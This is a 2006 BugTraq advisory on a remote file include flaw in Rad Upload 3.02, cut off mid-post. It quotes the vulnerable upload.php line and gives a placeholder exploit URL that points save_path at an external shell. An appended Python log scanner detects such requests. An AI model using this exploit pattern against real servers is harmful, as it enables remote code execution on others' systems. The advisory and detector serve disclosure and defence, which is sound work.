BugTraq
Web Apps- Rad Upload Version 3.02 Remote File Include Vulnerability Dec 12 2006 04:47PM
rko thelegendkiller gmail com
*^* Rad Upload Version 3.02 Remote File Include Vulnerability

*^* Source: http://www.radinks.com/downloads/raduploadlite.zip

*^* Vulnerable C0de On Line 39 In upload.php:
if(isset($save_path) && $save_path!="")

*^* (EXploit) http://[victim]/[directory]/upload.php?save_path=[sh3ll]?

*^* Fou...
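
Added example, not part of the original post or of Rad Upload's code: a defender-side scan of web server access logs for requests to upload.php whose save_path parameter carries a URL scheme, the request shape shown in the advisory. It also flags directory traversal in the same parameter, which goes beyond what the advisory describes; the log lines, hosts and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); hosts and paths are made up.
SAMPLE_LOG = '''\
192.0.2.10 - - [12/Dec/2006:16:50:01 +0000] "GET /rad/upload.php?save_path=http%3A%2F%2Fexample.invalid%2Fx.txt%3F HTTP/1.1" 200 512
192.0.2.11 - - [12/Dec/2006:16:51:14 +0000] "POST /rad/upload.php HTTP/1.1" 200 2048
192.0.2.12 - - [12/Dec/2006:16:52:30 +0000] "GET /rad/upload.php?save_path=uploads HTTP/1.1" 200 130
192.0.2.13 - - [12/Dec/2006:16:53:02 +0000] "GET /rad/upload.php?x=1&save_path=../../etc/ HTTP/1.1" 200 98
192.0.2.14 - - [12/Dec/2006:16:54:45 +0000] "GET /index.php?save_path=ftp://example.invalid/a HTTP/1.1" 404 0
'''

# client, method, request target, status from one combined-format line
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# any leading URL scheme: http:, ftp:, php:, data: ...
SCHEME = re.compile(r'^[a-z][a-z0-9+.\-]*:', re.I)


def classify(value):
    """Return why a decoded save_path value is suspicious, or None."""
    if SCHEME.match(value) or value.startswith('//'):
        return 'url-scheme'
    if '..' in value.replace('\\', '/').split('/'):
        return 'traversal'
    return None


def scan(log_text, script='upload.php', param='save_path'):
    """Return (client, status, reason, value) for flagged requests to `script`."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith('/' + script):
            continue
        # parse_qs percent-decodes, so encoded schemes are caught too
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            reason = classify(value)
            if reason:
                hits.append((client, int(status), reason, value))
    return hits


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A flagged request that returned status 200 is the one to follow up first; the scan only reads GET query strings, so a save_path sent in a POST body would need the application or WAF logs instead.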

Copyright 2010, SecurityFocus